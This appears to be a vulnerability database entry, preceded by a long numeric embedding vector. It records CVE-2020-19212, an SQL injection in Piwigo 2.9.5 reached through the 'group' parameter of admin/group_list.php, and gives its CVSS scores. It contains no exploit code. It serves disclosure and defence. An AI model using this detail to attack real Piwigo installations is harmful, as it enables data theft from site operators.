-0.0028898250311613083, -0.02112942934036255, -0.003350281622260809, -0.025314057245850563, 0.00678528705611825, 0.0017874921904876828, -0.016664842143654823, 0.00750728277489543, -0.0007192330667749047, -0.006575318984687328, 0.0022470278199762106, 0.001967070158571005, -0.0017423673998564482, 0.004722442012280226, 0.009319639764726162, 0.01315800566226244, -0.012406540103256702, 0.0015581848565489054, -0.009356476366519928, -0.0018123568734154105, -0.0063911364413797855, -0.017563654109835625, -0.00984271802008152, -0.009665902704000473, 0.03067745454609394, 0.0023409610148519278, -0.025962380692362785, 0.03179728612303734, -0.006225372198969126, -0.0065126968547701836, -0.03940034285187721, -0.003904671175405383, -0.00664899218827486, 0.017637325450778008, 0.017106879502534866, 0.014845117926597595, 0.006295361556112766, -0.012539152055978775, -0.014793546870350838, -0.005864374339580536, 0.0034055362921208143, -0.014204162172973156, -0.0017736784648150206, 0.002140201861038804, 0.016664842143654823, -0.005009766668081284, -0.007138917688280344, 0.007492548320442438, -0.0012929618824273348, -0.014579894952476025, -0.027244290336966515, -0.0007712646620348096, -0.01220762263983488, -0.011176200583577156, 0.003366857999935746, -0.01219288818538189, 0.0046561360359191895, 0.0011170675279572606, 0.021232571452856064, 0.004648768808692694, 0.010247919708490372, -0.018182506784796715, 0.0007505441317334771, 0.013938939198851585, 0.006173801142722368, -0.004733493085950613, -0.0030040182173252106, -0.0010747055057436228, -0.0015729194274172187, 0.024105818942189217, -0.008022994734346867, 0.013467431999742985, -0.019582293927669525, -0.02062845230102539, -0.0024662050418555737, -0.020908409729599953, -0.016149131581187248, -0.019405478611588478, -0.02191036194562912, 0.00246067950502038, 0.01375475712120533, -0.0209968164563179, -0.002657755045220256, 0.028526201844215393, -0.013165372423827648, 0.012502315454185009, -0.018388791009783745, 0.007503599394112825, 0.008641847409307957, -0.008081932552158833, -0.007286263629794121, 0.004740860313177109, 0.011890828609466553, 0.0032655575778335333, -0.008781827054917812, 0.01461673155426979, -0.014498854987323284, 0.0011235139099881053, 0.0011354857124388218, -0.005820170510560274, -0.01968543604016304, 0.009054416790604591, -0.008663949556648731, 0.02039269730448723, 0.019376009702682495, 0.01068995799869299, -0.027907349169254303, -0.015633419156074524, -0.008428196422755718, -0.0073488857597112656, 0.012598089873790741, 0.009548026137053967, -0.0057243951596319675, 0.001207316992804408, -0.017519449815154076, 0.0017543393187224865, -0.009997432120144367, 0.004969246685504913, -0.006019087508320808, -0.0038862528745085, -0.002530669094994664, -0.009798514656722546, -0.014653568156063557, -0.011227771639823914, 0.0045529939234256744, 0.012627559714019299, 0.01771099865436554, -0.0053891828283667564, -0.004575096070766449, -0.047916945070028305, -0.016001785174012184, 0.013600043952465057, -0.03241613879799843, 0.013717920519411564, 0.025461403653025627, 0.0022912316489964724, -0.002002064837142825, 0.00010026440577348694, 0.0010940446518361568, 0.005160796456038952, 0.008884969167411327, -0.0030997933354228735, 0.012030807323753834, 0.0063064126297831535, 0.014734608121216297, 0.0025822401512414217, 0.02599184960126877, 0.0055733658373355865, -0.00844293087720871, 0.019243398681282997, -0.014631466008722782, 0.011183567345142365, 0.019994864240288734, 0.01278963964432478, -0.02512250654399395, 0.008067198097705841, 0.00864921510219574, -0.020569512620568275, 0.015721827745437622, 0.010491041466593742, 0.03374225273728371, -0.009135456755757332, -0.018256179988384247, 0.0009379499242641032, 0.009909024462103844, 0.015766030177474022, 0.017239492386579514, -0.013577941805124283, -0.000017727576050674543, -0.0031992518343031406, 0.008479767479002476, -0.025888707488775253, -0.007558854296803474, -0.022381870076060295, 0.025726625695824623, 0.02244080789387226, -0.004634034354239702, -0.0005175531259737909, 0.001782887615263462, 0.009739575907588005, 0.0018722162349149585, -0.009415415115654469, -0.0048403190448880196, 0.002574872924014926, -0.02161567099392414, 0.026758048683404922, -0.015957580879330635, -0.015080871991813183, 0.020481105893850327, 0.005606518592685461, -0.008067198097705841, 0.009518557228147984, 0.013806328177452087, 0.001959702931344509, 0.011522463522851467, 0.02347223088145256, 0.0054444377310574055, 0.022573420777916908, 0.017121614888310432, 0.017062677070498466, -0.002935870783403516, 0.010181614197790623, -0.005606518592685461, -0.013968409039080143, -0.011662442237138748, 0.016340680420398712, 0.014380977489054203, -0.0010351062519475818, 0.012752803973853588, 0.018388791009783745, 0.00858290959149599, -0.018359322100877762, 0.0013454539002850652, -0.025004630908370018, -0.010078472085297108, -0.015235585160553455, -0.0015508175129070878, 0.0064279730431735516, 0.04164000228047371, 0.0007450186531059444, -0.003488418646156788, 0.0013905786909162998, 0.017136350274086, -0.01943494938313961, 0.007573588751256466, -0.007809342350810766, 0.006070658564567566, -0.004398280754685402, -0.015869174152612686, -0.028776690363883972, 0.020864205434918404, 0.011183567345142365, -0.011227771639823914, -0.0005787938134744763, -0.014513589441776276, -0.03480314463376999, -0.018005691468715668, 0.0018455097451806068, 0.014189427718520164, 0.01684165745973587, 0.005952781997621059, 0.007153652608394623, -0.00008282461203634739, 0.006700563244521618, -0.013084332458674908, -0.0030795331113040447, -0.02796628698706627, 0.005580733064562082, -0.0008992715738713741, 0.023987943306565285, -0.012936986051499844, -0.00694000069051981, 0.0180793646723032, -0.009938493371009827, -0.0005534687079489231, -0.025977114215493202, 0.023545904085040092, 0.004169894382357597, 0.02149779349565506, -0.010115308687090874, -0.015353461727499962, -0.03533359244465828, 0.011279342696070671, -0.024223696440458298, -0.008921805769205093, -0.008295584470033646, 0.004328291397541761, -0.000941633596085012, -0.010829937644302845, -0.011242506094276905, -0.009319639764726162, -0.008376624435186386, -0.006626890040934086, -0.009223864413797855, -0.030706923454999924, -0.0022065076045691967, 0.004309873096644878, 0.0023943737614899874, -0.0319446325302124, -0.02363431267440319, 0.0034239545930176973, -0.009268068708479404, -0.001111541991122067, -0.023693250492215157, 0.0030997933354228735, -0.004497739020735025, 0.003403694601729512, 0.014447283931076527, 0.007978790439665318, 0.006509013473987579, 0.005683875177055597, -0.019876986742019653, -0.03689545765519142, -0.004405647981911898, 0.012981190346181393, 0.012575988657772541, 0.03318233788013458, 0.0007063403027132154, 0.012730701826512814, -0.009142824448645115, -0.008597644045948982, -0.0005249204114079475, -0.027863144874572754, -0.006125913467258215, 0.038899365812540054, -0.0011014119954779744, -0.0110141197219491, 0.025137241929769516, 0.005665456876158714, -0.01766679622232914, -0.0049066245555877686, -0.0013519002823159099, -0.0319446325302124, 0.01569235883653164, 0.010078472085297108, 0.005411284975707531, -0.0100932065397501, 0.03035329282283783, -0.0032784503418952227, 0.0008780905627645552, 0.009363844059407711, 0.011640341021120548, -0.006833174731582403, -0.021674608811736107, -0.020569512620568275, 0.009570128284394741, -0.03719015046954155, 0.016370149329304695, 0.01890450343489647, -0.010726794600486755, -0.009290170855820179, -0.005459172185510397, 0.0085902763530612, 0.0006860801950097084, -0.007941953837871552, 0.012944353744387627, 0.009548026137053967, 0.03335915505886078, 0.006962102372199297, 0.013231677934527397, -0.002256236970424652, -0.009614331647753716, 0.01812356896698475, -0.0017064518760889769, 0.009400679729878902, 0.02335435524582863, 0.008457665331661701, 0.0007638973766006529, 0.0017184236785396934, 0.001486353576183319, -0.008118769153952599, -0.009312272071838379, 0.0035031531006097794, 0.01219288818538189, 0.012612825259566307, 0.0071794381365180016, -0.0008628955110907555, 0.0022101912181824446, 0.003353965235874057, 0.01315800566226244, 0.01741630770266056, -0.01480828132480383, -0.019331805408000946, -0.0038678348064422607, 0.005190265830606222, 0.006365350913256407, 0.0019320754799991846, 0.010468939319252968, -0.043378688395023346, 0.026036053895950317, 0.0035713007673621178, -0.014204162172973156, 0.0002465744619257748, -0.009327007457613945, -0.010535244829952717, 0.0063911364413797855, 0.006026454735547304, -0.004114639479666948, -0.023324884474277496, -0.020687390118837357, -0.0022930733393877745, 0.012819109484553337, 0.03353596851229668, -0.0002946921740658581, -0.017327899113297462, 0.0011750849662348628, -0.02537299506366253, -0.013172740116715431, -0.020039066672325134, -0.004497739020735025, -0.027480045333504677, 0.030736392363905907, -0.0019468101672828197, -0.027538983151316643, -0.009327007457613945, 0.003197409911081195, -0.009717474691569805, 0.008715520612895489, 0.014204162172973156, -0.00819244235754013, -0.024724673479795456, 0.001249679015018046, -0.007039458956569433, 0.010130043141543865, 0.0025288271717727184, 0.008907070383429527, 0.00471507478505373, -0.023324884474277496, 0.025918176397681236, 0.006206953898072243, -0.001801305916160345, -0.006575318984687328, -0.02998492866754532, 0.00909862108528614, -0.0179909560829401, 0.004074119031429291, -0.013268514536321163, 0.00016104466340038925, -0.016650106757879257, -0.008546072989702225, -0.008752357214689255, 0.00870815385133028, 0.03365384414792061, -0.013762123882770538, -0.013990510255098343, -0.008000892587006092, 0.020481105893850327, -0.0013970250729471445, 0.011257240548729897, -0.021939832717180252, 0.025638218969106674, 0.0014927999582141638, -0.0009982697665691376, -0.029189258813858032, 0.00916492659598589, -0.01108042523264885, -0.0053891828283667564, 0.01638488471508026, -0.004744543693959713, -0.006505329627543688, 0.005908578168600798, -0.0016097559127956629, 0.002296757185831666, -0.008126136846840382, 0.0044682701118290424, 0.011102527379989624, 0.007544119376689196, 0.02182195521891117, 0.005072388797998428, 0.000604579399805516, -0.028010491281747818, 0.006800021976232529, 0.011721380986273289, -0.0035786679945886135, -0.01803516037762165, 0.01066785678267479, 0.010653122328221798, 0.0011640340089797974, -0.017475245520472527, 0.003313445020467043, -0.014115754514932632, -0.03088373877108097, 0.02445944957435131, 0.01775520294904709, -0.0003911578096449375, 0.003390801837667823, 0.014594629406929016, 0.017843611538410187, 0.01264229416847229, 0.02808416448533535, -0.0033023941796272993, 0.005234469659626484, -0.007779873441904783, 0.00400412967428565, 0.0009448567871004343, -0.009054416790604591, -0.038074228912591934, 0.017740469425916672, 0.0022709714248776436, -0.004652452655136585, -0.0301470085978508, 0.0034368473570793867, 0.004103588405996561, 0.004807165823876858, -0.01048367377370596, 0.0014163642190396786, -0.015102973207831383, -0.012627559714019299, 0.005123959854245186, 0.0090396823361516, 0.007993524894118309, 0.019670702517032623, 0.015574481338262558, 0.008811295963823795, -0.02384059689939022, -0.022411338984966278, 0.003549198852851987, 0.005801752209663391, 0.002456995891407132, -0.0018878716509789228, -0.013784226030111313, 0.0015370037872344255, 0.005035552196204662, 0.005845956038683653, 0.021158898249268532, 0.02191036194562912, -0.007083662785589695, -0.005219735205173492, 0.008803928270936012, -0.014727241359651089, -0.02537299506366253, -0.019376009702682495, 0.006486911326646805, -0.02721482142806053, -0.014123122207820415, -0.010130043141543865, 0.030589047819375992, 0.017593123018741608, -0.005503376014530659, 0.0020536361262202263, 0.001429256983101368, -0.0047482275404036045, 0.01093307975679636, 0.010984650813043118, -0.009150192141532898, 0.0005530082853510976, -0.007809342350810766, -0.0023483282420784235, 0.0038973039481788874, -0.020127475261688232, 0.02342802658677101, 0.005300775170326233, 0.032592952251434326, -0.036423951387405396, -0.012082379311323166, 0.012052909471094608, 0.018005691468715668, 0.02668437547981739, -0.03223932161927223, 0.0063727181404829025, -0.02721482142806053, 0.002989283762872219, 0.00769146578386426, -0.0025085671804845333, -0.011993971653282642, -0.002165987389162183, -0.011154098436236382, 0.006748450454324484, -0.026831721886992455, 0.01371055282652378, 0.0016567225102335215, -0.016576433554291725, 0.0048403190448880196, -0.026758048683404922, -0.005941730923950672, -0.006100127939134836, 0.019199194386601448, -0.003197409911081195, 0.01688586175441742, -0.023501699790358543, 0.003429480129852891, 0.0053965505212545395, 0.029881786555051804, -0.010468939319252968, 0.006041189655661583, -0.02647809125483036, -0.017814140766859055, 0.016208069398999214, -0.0028419375885277987, -0.010203716345131397, 0.004313556477427483, -0.008022994734346867, -0.003724172245711088, 0.015471339225769043, -0.009791146963834763, 0.009172293357551098, -0.004810849670320749, -0.0007192330667749047, -0.005492325406521559, 0.011235139332711697, -0.010115308687090874, 0.00012996385339647532, 0.014218897558748722, -0.005385499447584152, -0.011772952042520046, 0.0008771696593612432, 0.016900595277547836, -0.0034828931093215942, 0.01198660396039486, 0.00567282410338521, -0.01132354699075222, 0.022882847115397453, 0.023663781583309174, 0.004788747522979975, 0.007588323205709457, 0.003396327141672373, 0.002140201861038804, 0.009570128284394741, -0.0019707537721842527, 0.00357314245775342, 0.009275436401367188, 0.009024947881698608, -0.005580733064562082, -0.00001767001776897814, -0.0009651168365962803, 0.008104034699499607, 0.016738515347242355, 0.04137478023767471, 0.00004411748886923306, 0.0016806662315502763, -0.0060338219627738, -0.004166210535913706, -0.0005783333908766508, 0.0063911364413797855, -0.012178153730928898, -0.015235585160553455, -0.008457665331661701, -0.0026117092929780483, -0.005857006646692753, 0.00034718422102741897, 0.014425181783735752, 0.012819109484553337, 0.021217836067080498, 0.0070136734284460545, -0.01853613741695881, 0.00621800497174263, -0.0037149630952626467, 0.014093653298914433, 0.009724841453135014, -0.021689344197511673, 0.0033760671503841877, 0.006380085367709398, 0.01998012885451317, 0.009938493371009827, -0.01606072299182415, 0.02062845230102539, 0.004269352648407221, 0.006788970902562141, -0.015265054069459438, -0.009466986171901226, -0.004965562839061022, 0.0025509290862828493, -0.0005396550404839218, 0.009665902704000473, 0.002790366532281041, 0.011448790319263935, 0.015294523909687996, 0.02017167955636978, -0.025564545765519142, 0.0014596472028642893, -0.0021144163329154253, -0.002414633985608816, 0.011434055864810944, 0.00194312643725425, -0.0010268180631101131, -0.009408047422766685, -0.015353461727499962, -0.016753248870372772, -0.011625605635344982, -0.009260701015591621, -0.01791728474199772, 0.006265892181545496, 0.010549979284405708, 0.04744543880224228, -0.0020738961175084114, -0.018182506784796715, -0.00963643379509449, 0.0028677231166511774, -0.009791146963834763, -0.0024477867409586906, 0.02849673293530941, -0.010660489089787006, -0.013408493250608444, 0.007816709578037262, -0.001466093584895134, -0.001803147722966969, 0.014520956203341484, 0.011242506094276905, 0.00943014957010746, 0.0019173409091308713, 0.000032145620934898034, 0.005470223259180784, 0.012708599679172039, 0.001071942737326026, 0.016355415806174278, 0.021586202085018158, -0.007352569606155157, -0.0038862528745085, -0.01015214528888464, -0.0019744376186281443, -0.006472176872193813, 0.012141317129135132, -0.014005245640873909, -0.00396360969170928, -0.0027664226945489645, 0.021880893036723137, 0.002830886747688055, -0.034862082451581955, 0.013408493250608444, -0.000593988923355937, -0.006125913467258215, 0.005628620274364948, 0.010247919708490372, -0.024783611297607422, 0.01688586175441742, 0.028555670753121376, 0.008339788764715195, -0.0040999045595526695, 0.010594183579087257, 0.024695204570889473, 0.0020517942029982805, -0.00870815385133028, -0.013732654973864555, -0.01886029914021492, 0.005300775170326233, 0.00645375857129693, -0.020746327936649323, -0.01278963964432478, -0.0013979459181427956, -0.020112739875912666, 0.0024662050418555737, -0.012509682215750217, 0.00963643379509449, 0.01140458695590496, -0.004541942849755287, 0.032180383801460266, 0.012797007337212563, 0.008325053378939629, -0.0016788244247436523, 0.009268068708479404, -0.014115754514932632, -0.014049449004232883, -0.01989172212779522, -0.014609363861382008, -0.015500808134675026, -0.008081932552158833, -0.01989172212779522, -0.00988692231476307, 0.02837885543704033, 0.018875032663345337, -0.02734743244946003, 0.0028032592963427305, -0.022205054759979248, 0.0042840875685215, -0.0005585337639786303, 0.001108779339119792, -0.020083270967006683, -0.0037591669242829084, -0.015368196181952953, -0.01482301577925682, 0.00976167805492878, 0.0016548807034268975, -0.0048403190448880196, -0.028025224804878235, 0.010247919708490372, 0.00969537254422903, 0.022293463349342346, -0.027907349169254303, 0.003783110762014985, 0.008295584470033646, -0.011647707782685757, -0.019670702517032623, -0.010712060146033764, 0.004225148819386959, 0.010410000570118427, 0.007816709578037262, 0.004077802877873182, 0.006593737285584211, -0.005717027932405472, 0.02034849487245083, 0.02397320792078972, -0.010549979284405708, 0.006991571746766567, 0.019331805408000946, -0.002258078660815954, -0.01585443876683712, -0.022219790145754814, 0.002631969517096877, -0.0057243951596319675, -0.010063737630844116, 0.0015950213419273496, 0.002195456763729453, 0.010299491696059704, 0.01881609484553337, -0.031148962676525116, -0.005168163683265448, 0.009253334254026413, -0.009960595518350601, -0.011294077150523663, 0.001086677424609661, 0.008929172530770302, -0.004508790094405413, -0.022720765322446823, -0.00996796227991581, 0.011353015899658203, 0.020893674343824387, -0.011699278838932514, -0.034243229776620865, 0.04040229693055153, -0.00031218951335176826, 0.013828430324792862, 0.0005005162092857063, 0.0048403190448880196, 0.016753248870372772, 0.01939074508845806, -0.011809788644313812, 0.011117261834442616, -0.011065690778195858, 0.005492325406521559, 0.0028787741903215647, 0.0080082593485713, 0.005591783672571182, -0.009327007457613945, -0.01787308044731617, 0.004471953492611647, -0.0035160458646714687, -0.02512250654399395, -0.00085184455383569, -0.019552825018763542, -0.011397219263017178, -0.005926996003836393, 0.027789471670985222, 0.018094098195433617, 0.010645754635334015, 0.022042974829673767, -0.027141148224473, 0.0020278505980968475, 0.0026688058860599995, 0.013408493250608444, 0.00337238353677094, -0.0012809899635612965, 0.007632527034729719, -0.004762961994856596, 0.009297537617385387, -0.004166210535913706, 0.0023667465429753065, -0.0039599258452653885, 0.005532845389097929, -0.00017554905207362026, -0.010756264440715313, 0.007941953837871552, 0.0032434556633234024, 0.005042919889092445, -0.006545849610120058, 0.012760170735418797, 0.012119214981794357, 0.007219958119094372, -0.009496455080807209, -0.011448790319263935, -0.017077410593628883, 0.017283694818615913, 0.007382038980722427, -0.017431041225790977, -0.030618516728281975, -0.005319193471223116, 0.006711614318192005, 0.009990064427256584, 0.019611764699220657, 0.009444884024560452, -0.019950659945607185, -0.023280682042241096, -0.0034828931093215942, -0.018624544143676758, 0.002639336744323373, -0.0030021765269339085, 0.0027130097150802612, -0.002512250794097781, 0.0026117092929780483, 0.008509236387908459, 0.0037352233193814754, -0.007941953837871552, 0.01008583977818489, 0.025387730449438095, 0.028393590822815895, -0.01729843020439148, -0.00916492659598589, 0.006925265770405531, 0.017696265131235123, -0.005009766668081284, -0.0027701063081622124, 0.027067475020885468, 0.007551486603915691, -0.02026008628308773, 0.015957580879330635, -0.023442761972546577, 0.017814140766859055, 0.00511659262701869, 0.006604788359254599, 0.006748450454324484, -0.009503822773694992, 0.013187474571168423, 0.003584193531423807, -0.014064183458685875, 0.00045193807454779744, 0.0032839758787304163, 0.000733046792447567, -0.011124629527330399, 0.028850363567471504, -0.007529384922236204, 0.021586202085018158, 0.0033797507639974356, 0.002910085255280137, 0.008966009132564068, 0.005812802817672491, 0.000372279086150229, 0.008840764872729778, -0.005823853891342878, 0.005216051358729601, 0.006490595173090696, 0.005757548380643129, -0.012922251597046852, -0.002814310137182474, -0.00005102433715364896, 0.024562591686844826, 0.007875648327171803, 0.019965393468737602, 0.0003570840344764292, -0.013725287280976772, -0.006346932612359524, -0.0019744376186281443, -0.006800021976232529, -0.007676730863749981, -0.015707092359662056, 0.011935032904148102, 0.002700116951018572, -0.03365384414792061, -0.011131996288895607, 0.02647809125483036, 0.008826030418276787, -0.01447675283998251, 0.001429256983101368, -0.005650722421705723, -0.026949599385261536, 0.014388345181941986, 0.0073304674588143826, 0.03055957704782486, 0.01396104134619236, 0.004037282895296812, -0.004110955633223057, -0.0062511577270925045, 0.0032839758787304163, -0.019213929772377014, 0.01513244304805994, -0.017858345061540604, -0.0029432380106300116, 0.015309258364140987, 0.011809788644313812, -0.012156051583588123, 0.000032836305763339624, -0.009142824448645115, -0.0007859992911107838, 0.010203716345131397, 0.0030445384327322245, -0.016090191900730133, -0.005142378155142069, 0.018462464213371277, 0.012008706107735634, 0.0017165818717330694, 0.017313165590167046, 0.034773677587509155, -0.012782272882759571, 0.007684098090976477, 0.023162804543972015, 0.021438855677843094, -0.00694000069051981, -0.014719873666763306, -0.002302282489836216, 0.0025656637735664845, 0.0012017914559692144, 0.007883015088737011, -0.002018641447648406, -0.010535244829952717, -0.012575988657772541, -0.0019136572955176234, 0.021217836067080498, 0.011949767358601093, -0.0024662050418555737, -0.032298263162374496, 0.0017119772965088487, 0.0016189650632441044, 0.01734263449907303, 0.00831768661737442, 0.01318010687828064, -0.013673716224730015, 0.0010378690203651786, 0.013622145168483257, 0.007024724502116442, -0.007949321530759335, -0.005812802817672491, 0.005853323265910149, -0.017033208161592484, -0.03344755992293358, 0.004276719875633717, -0.017077410593628883, 0.013688451610505581, 0.006593737285584211, -0.010969916358590126, 0.0023280680179595947, 0.01329798437654972, 0.006357983686029911, 0.012959088198840618, -0.02845252864062786, -0.017976222559809685, 0.014594629406929016, -0.005219735205173492, -0.011456158012151718, 0.0003504074120428413, 0.003068482270464301, -0.009268068708479404, 0.00846503209322691, 0.011463525705039501, 0.02450365386903286, 0.009614331647753716, -0.022190319374203682, 0.006523747928440571, 0.016399618238210678, 0.018727688118815422, 0.011271975003182888, -0.01455779280513525, 0.030176477506756783, 0.0014016296481713653, -0.002121783560141921, -0.02445944957435131, -0.004483004566282034, 0.007006306201219559, 0.017902549356222153, -0.012797007337212563, 0.011176200583577156, 0.00017531881167087704, -0.005212367512285709, -0.014520956203341484, 0.032268792390823364, 0.005669140722602606, -0.0018095941049978137, -0.000332219380652532, 0.007334151305258274, -0.008413461036980152, -0.017062677070498466, -0.019906455650925636, -0.010918344371020794, 0.007551486603915691, 0.004166210535913706, 0.011979236267507076, 0.006015403661876917, 0.020952614024281502, 0.018020426854491234, -0.00047242839355021715, -0.01329798437654972, 0.031031085178256035, 0.032091978937387466, 0.001009320723824203, 0.013938939198851585, -0.010505775921046734, -0.01840352639555931, 0.006181168369948864, 0.012185521423816681, 0.014174693264067173, 0.005496008787304163, 0.016134396195411682, 0.008288216777145863, 0.00285114673897624, 0.008988111279904842, -0.011227771639823914, 0.01180242095142603, 0.0012533626286312938, -0.001959702931344509, 0.009533291682600975, -0.00018153498240280896, 0.0135705741122365, 0.0076619964092969894, 0.013172740116715431, 0.02232293225824833, -0.007890382781624794, -0.0209968164563179, -0.012539152055978775, 0.022706031799316406, 0.015066137537360191, -0.0420820415019989, 0.003166099078953266, 0.00988692231476307, -0.014358876273036003, -0.011006752029061317, 0.004877155181020498, -0.019788580015301704, -0.018933972343802452, -0.027170617133378983, 0.01179505418986082, -0.0015158228343352675, 0.009268068708479404, -0.020436901599168777, 0.0013261147541925311, 0.0026651222724467516, -0.016605904325842857, -0.00877445936203003, 0.011073058471083641, -0.0015388457104563713, 0.0047555947676301, -0.02528458833694458, -0.012369703501462936, -0.025726625695824623, 0.018300384283065796, -0.00510554201900959, 0.002204665681347251, -0.015102973207831383, 0.011993971653282642, -0.013909470289945602, -0.009400679729878902, -0.011964501813054085, 0.005249204114079475, -0.00026407180121168494, 0.006505329627543688, -0.03904671221971512, 0.009216497652232647, 0.016237538307905197, 0.011242506094276905, 0.015250319615006447, -0.004424066282808781, -0.0006777920061722398, -0.014078917913138866, -0.017725734040141106, 0.012708599679172039, -0.0016732990043237805, -0.010137410834431648, -0.01746051013469696, 0.00749623216688633, -0.008899703621864319, 0.014668302610516548, -0.011441423557698727, 0.005053970497101545, 0.022927051410079002, 0.0022543950472027063, -0.0020094322971999645, -0.0005833983886986971, 0.005053970497101545, 0.004788747522979975, 0.017725734040141106, -0.004040966276079416, -0.0023556954693049192, -0.0020481105893850327, -0.005982250906527042, -0.006954735144972801, -0.014631466008722782, -0.003039012895897031, 0.0015719985822215676, -0.005919628776609898, -0.00012006403267150745, -0.003724172245711088, 0.014837750233709812, -0.007168387062847614, 0.024577327072620392, 0.029425013810396194, 0.001130881137214601, -0.004781380295753479, -0.003985711373388767, -0.00883339811116457, 0.009997432120144367, -0.009194395504891872, -0.015913376584649086, -0.0019449683604761958, -0.012612825259566307, 0.03138471767306328, -0.011868727393448353, -0.006085393484681845, -0.022794438526034355, -0.02462153136730194, 0.012657028622925282, 0.009437516331672668, -0.02120310068130493, 0.01832985319197178, 0.010940446518361568, -0.013909470289945602, 0.01344532985240221, 0.006490595173090696, 0.02459206059575081, -0.012104480527341366, -0.0070873466320335865, 0.0069657862186431885, 0.0033410724718123674, 0.002834570361301303, 0.013784226030111313, 0.015707092359662056, -0.0015839703846722841, -0.020952614024281502, -0.005002399440854788, 0.018595075234770775, -0.004092537332326174, -0.007713567465543747, -0.016031254082918167, -0.022573420777916908, -0.0161049272865057, -0.013003291562199593, -0.005845956038683653, -0.00039599259616807103, 0.016237538307905197, -0.0008573700324632227, -0.0047850641421973705, -0.012266561388969421, -0.006192218977957964, 0.007463078945875168, 0.02574136108160019, -0.013401126489043236, -0.005219735205173492, 0.00011879778321599588, 0.0037168050184845924, -0.015913376584649086, 0.0502450130879879, 0.017106879502534866, 0.005017134360969067, 0.004740860313177109, -0.0047666458413004875, -0.002637494821101427, -0.0019118154887109995, -0.0056396713480353355, -0.004497739020735025, 0.004166210535913706, -0.015662888064980507, -0.00495082838460803, 0.004958195611834526, -0.0006294440245255828, -0.01002690102905035, -0.0018270914442837238, 0.009923758916556835, -0.01375475712120533, -0.004350393079221249, -0.018919236958026886, 0.013010659255087376, 0.010041635483503342, 0.019832782447338104, -0.020569512620568275, -0.014771444723010063, 0.008273482322692871, 0.013415860943496227, -0.032062508165836334, -0.004862420726567507, -0.0012763855047523975, 0.016252273693680763, -0.018683483824133873, -0.01348953414708376, -0.0033576488494873047, 0.008627112954854965, -0.0013546630507335067, 0.004858737345784903, 0.022706031799316406, -0.01998012885451317, -0.010859406553208828, -0.015603950247168541, 0.0006800942937843502, 0.005061338189989328, 0.0022120331414043903, -0.0319446325302124, 0.019169725477695465, -0.019081318750977516, 0.03721962124109268, 0.031031085178256035, 0.025623483583331108, 0.009415415115654469, 0.016458557918667793, -0.014712506905198097, 0.004641401581466198, 0.011485626921057701, -0.0070505100302398205, 0.015368196181952953, -0.005647038575261831, -0.021763017401099205, -0.016399618238210678, 0.008663949556648731, 0.005816486664116383, -0.015250319615006447, -0.008325053378939629, -0.02301545813679695, -0.002595132915303111, 0.011957135051488876, -0.002595132915303111, 0.0029285033233463764, 0.03159100189805031, -0.012133950367569923, -0.00831768661737442, -0.006243790499866009, -0.007345202378928661, -0.007890382781624794, -0.02845252864062786, -0.007278896402567625, -0.011883461847901344, 0.01416732557117939, -0.0016668526222929358, -0.020481105893850327, -0.02622760273516178, -0.006369034294039011, 0.000025267550881835632, 0.017018472775816917, -0.002105207182466984, -0.004512473940849304, -0.008361889980733395, 0.007654629182070494, 0.00285114673897624, 0.03200357034802437, 0.002075738040730357, -0.012340234592556953, -0.014727241359651089, 0.022617623209953308, -0.006015403661876917, 0.00659005343914032, 0.013401126489043236, 0.000045700307964580134, 0.00471507478505373, 0.007385722361505032, -0.010896243155002594, -0.021350447088479996, -0.009982696734368801, -0.006302728783339262, -0.021026285365223885, 0.00813350360840559, -0.008826030418276787, -0.007183121517300606, 0.009717474691569805, 0.015441869385540485, -0.005893843248486519, -0.015161911956965923, -0.002994809066876769, 0.015500808134675026, 0.005938047077506781, 0.01258335541933775, -0.01305486261844635, 0.0025932909920811653, 0.012701231986284256, -0.014793546870350838, 0.0012220515636727214, 0.020731594413518906, -0.010925712063908577, -0.02581503428518772, -0.006755818147212267, 0.015795500949025154, 0.030854269862174988, 0.03907618299126625, -0.031119493767619133, -0.005908578168600798, 0.01480091456323862, 0.015957580879330635, 0.017769938334822655, 0.02034849487245083, 0.0004570031014736742, -0.006796338129788637, 0.012804375030100346, 0.005610201973468065, 0.006461125798523426, 0.01416732557117939, 0.04352603480219841, 0.0007440977497026324, 0.002609867602586746, -0.02280917391180992, 0.0120455427095294, -0.005182898603379726, -0.011640341021120548, -0.006284310482442379, -0.002241502283141017, -0.001267176354303956, -0.0014937209198251367, -0.00006670863513136283, -0.0032471392769366503, 0.011419321410357952, 0.010608918033540249, -0.00245515420101583, 0.013850531540811062, -0.020127475261688232, 0.016488026827573776, -0.005820170510560274, 0.021880893036723137, -0.007956688292324543, -0.029749173671007156, -0.0009899814613163471, 0.0003515585558488965, 0.004302505869418383, -0.00030436174711212516, 0.010896243155002594, -0.0027627390809357166, -0.023295415565371513, -0.009621699340641499, 0.01220762263983488, -0.0033023941796272993, 0.017136350274086, 0.0031771499197930098, 0.00969537254422903, 0.0025822401512414217, 0.02186615951359272, 0.0064390236511826515, -0.0031992518343031406, 0.012097113765776157, -0.030854269862174988, -0.0003085058706346899, 0.01626700721681118, -0.0030813750345259905, 0.009238599799573421, -0.0070873466320335865, 0.007186805363744497, -0.0003375146188773215, 0.017106879502534866, -0.022868111729621887, 0.009032314643263817, 0.00400412967428565, 0.001443991670385003, 0.032799236476421356, -0.0029027177952229977, 0.00017508858582004905, 0.02037796378135681, -0.004022547975182533, 0.022750236093997955, -0.0020481105893850327, 0.008067198097705841, 0.004844002425670624 ]
CVE-2020-19212
2022-05-06T14:15:08.217000
SQL Injection vulnerability in admin/group_list.php in piwigo v2.9.5, via the group parameter to delete.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
